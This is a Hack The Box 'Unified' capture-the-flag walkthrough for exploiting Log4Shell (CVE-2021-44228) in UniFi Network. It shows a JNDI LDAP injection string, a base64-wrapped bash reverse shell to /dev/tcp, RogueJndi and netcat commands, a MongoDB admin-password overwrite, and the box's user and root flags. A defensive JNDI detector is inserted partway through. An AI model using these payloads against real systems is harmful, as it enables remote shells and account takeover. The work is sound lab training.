Hack The Box - Unified
This article discusses the solution for Hack the Box Unified Challenge tasks so proceed with caution.
I would suggest that you try to solve it on your own as you will learn a lot in the process of attempting. Try to give it your all until you feel that you are really hopelessly stuck.
Unified Solution
Which are the first four open ports?
Run the following to discover open ports:
nmap -sV {target_ip}
Answer: 22,6789,8080,8443
What is the title of the software that is running on port 8443?
- We know from the previous section that 8443 is an SSL service and that port 8080 is an HTTP service. Let's first check out {target_ip}:8080 in our browser. This redirects to
https://{target_ip}:8443/manage/account/login?redirect=%2Fmanage
- According to the hint we need to look at the title. So we inspect the page in our browser and find that the head tag contains a title tag with the text UniFi Network.
Answer: UniFi Network
What is the version of the software that is running?
Looking at the website we were redirected to we find the version.
Answer: 6.4.54
What is the CVE for the identified vulnerability?
Hint : Look for UniFi vulnerabilities in 2021
- Just do a Google search for unifi network version 6.4.54 cve
Answer: CVE-2021-44228
What protocol does JNDI leverage in the injection?
- We can just read the details of CVE that we found https://nvd.nist.gov/vuln/detail/CVE-2021-44228
Answer: LDAP
What tool do we use to intercept the traffic, indicating the attack was successful?
Hint: Not wireshark
- Let's just do a lookup for alternative software to Wireshark
Answer: tcpdump
What port do we need to inspect intercepted traffic for?
Hint: Default port for LDAP
- Let's do a lookup for default LDAP port
Answer: 389
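As an added example from the defender's side (not part of the original write-up), a small Python detector that pulls a `${jndi:...}` lookup out of a UniFi login request body, reports the protocol it uses (LDAP, as in the CVE above) together with the callback host and port, and falls back to LDAP's default port 389 when the lookup omits one. The request body, field names other than `remember`, and the callback address are constructed for the example.

```python
import json
import re
from urllib.parse import urlsplit

# Matches the plain lookup form seen in this box, e.g. ${jndi:ldap://host:1389/o=tomcat}.
# Obfuscated variants are not matched here and would need normalising first.
JNDI_RE = re.compile(r"\$\{jndi:(?P<scheme>[a-zA-Z]+):(?P<rest>[^}]*)\}")

# Port the JNDI provider connects to when the lookup gives none (389 = default LDAP port).
DEFAULT_PORTS = {"ldap": 389, "ldaps": 636, "rmi": 1099}


def parse_jndi_lookup(text):
    """Return one finding per ${jndi:...} lookup found in text."""
    findings = []
    for m in JNDI_RE.finditer(text):
        scheme = m.group("scheme").lower()
        url = urlsplit(f"{scheme}:{m.group('rest')}")
        findings.append({
            "scheme": scheme,
            "host": url.hostname,
            "port": url.port if url.port is not None else DEFAULT_PORTS.get(scheme),
            "path": url.path,
        })
    return findings


def scan_login_request(body):
    """Inspect a JSON login body field by field; fall back to raw text if it is not JSON."""
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return parse_jndi_lookup(body)
    findings = []
    for field, value in data.items():
        for finding in parse_jndi_lookup(str(value)):
            finding["field"] = field
            findings.append(finding)
    return findings


# Constructed sample: a login body whose remember field carries the lookup (callback IP is made up).
SAMPLE_REQUEST = json.dumps({
    "username": "administrator",
    "password": "x",
    "remember": "${jndi:ldap://10.10.14.9:1389/o=tomcat}",
})

if __name__ == "__main__":
    for f in scan_login_request(SAMPLE_REQUEST):
        print(f"{f['field']}: {f['scheme']} callback to {f['host']}:{f['port']} (path {f['path']})")
```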
What port is the MongoDB service running on?
Hint: Check the running processes on the system
The following converts the reverse shell payload to base64:
echo 'bash -c bash -i >&/dev/tcp/{Your IP Address}/{A port of your choice} 0>&1' | base64
java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,BASE64 STRING HERE}|{base64,-d}|{bash,-i}" --hostname "{YOUR TUN0 IP ADDRESS}"
Open a new terminal and start a netcat listener on the port you chose above:
nc -lvp 4444
Go back to Burp and set the remember value of the intercepted login request to ${jndi:ldap://{Your Tun0 IP}:1389/o=tomcat}
We now have a shell in our netcat listener; let's upgrade it to a proper bash shell:
script /dev/null -c bash
Let's list the running processes on the target and filter for mongo:
ps aux | grep mongo
Answer: 27117
What is the default database name for UniFi applications?
Hint: Connect to Mongo and list the databases
Let's connect to the mongo instance running on port 27117:
mongo --port 27117
- Let's list all databases
show dbs
Answer: ace
What is the function we use to enumerate users within the database in MongoDB?
Hint: Search for "find items in mongo" in Google
- Upon our google search we find
db.admin.find()
Answer: db.admin.find()
What is the function we use to update users within the database in MongoDB?
Hint: Search for "update items in mongo" in Google
Answer: db.admin.update()
What is the password for the root user?
- Now that we have access to MongoDB, let's enumerate all the users in UniFi's ace database to see if there is an interesting user. The forEach here pretty-prints each document as readable JSON.
mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"
OR
use ace
db.admin.find().forEach(printjson);
We have found a hash in the key x_shadow, which represents the password:
$6$Ry6Vdbse$8enMR5Znxoo.WfCMd/Xk65GwuQEPx1M.QP8/qHiQV0PvUc3uHuonK4WcTQFN1CRk3GwQaquyVwCVq8iQgPTt4.
The $6$ prefix of the hash gives away that it is a SHA-512 crypt hash. There is no quick way or tool to crack it, so instead we create a hash of our own and overwrite the administrator's password with it.
Let's create our own hash:
mkpasswd -m sha-512 Password1234
$6$DxHn0.Rx4LOznIAe$7YW85uGrCz.DvLORVa0jSDsn6ecADE3sVSH.i0lNpg19y30b83NfOSlpaii2cpbQWkwmxgP31OeZEnS2l5nvI0
- Now let's update the administrator's password
use ace
db.admin.update({"_id":ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$DxHn0.Rx4LOznIAe$7YW85uGrCz.DvLORVa0jSDsn6ecADE3sVSH.i0lNpg19y30b83NfOSlpaii2cpbQWkwmxgP31OeZEnS2l5nvI0"}})
OR
mongo --port 27117 ace --eval 'db.admin.update({"_id":ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$DxHn0.Rx4LOznIAe$7YW85uGrCz.DvLORVa0jSDsn6ecADE3sVSH.i0lNpg19y30b83NfOSlpaii2cpbQWkwmxgP31OeZEnS2l5nvI0"}})'
- Now let's go to the UniFi website again and log in with the user administrator and the modified password Password1234. We are now logged in.
Navigate to Settings to see if there is anything interesting; there we find that SSH authentication can be enabled and the root password is viewable.
Answer: NotACrackablePassword4U2022
Submit user flag
- Now let's try to connect via ssh. Open a new terminal and execute the following. (Use the password found in the settings)
ssh root@{target_ip_address}
We have successfully connected and now have a shell with root privileges.
Let's look for the user.txt file:
find -type f -name "user.txt"
Answer: 6ced1a6a89e666c0620cdb10262ba127
Submit root flag
- Let's look for the root.txt file:
find -type f -name "root.txt"
Answer: e50bc93c75b634e4b272d2f771c33681
Until next time. Keep learning.
Stay stoked and code. :)
I hope you can voluntarily Buy Me A Coffee if you found this article useful and give additional support for me to continue sharing more content for the community. :)
Thank you very much. :)
Written by
Niccolo Lampa
Full stack developer who loves to code, hack and surf.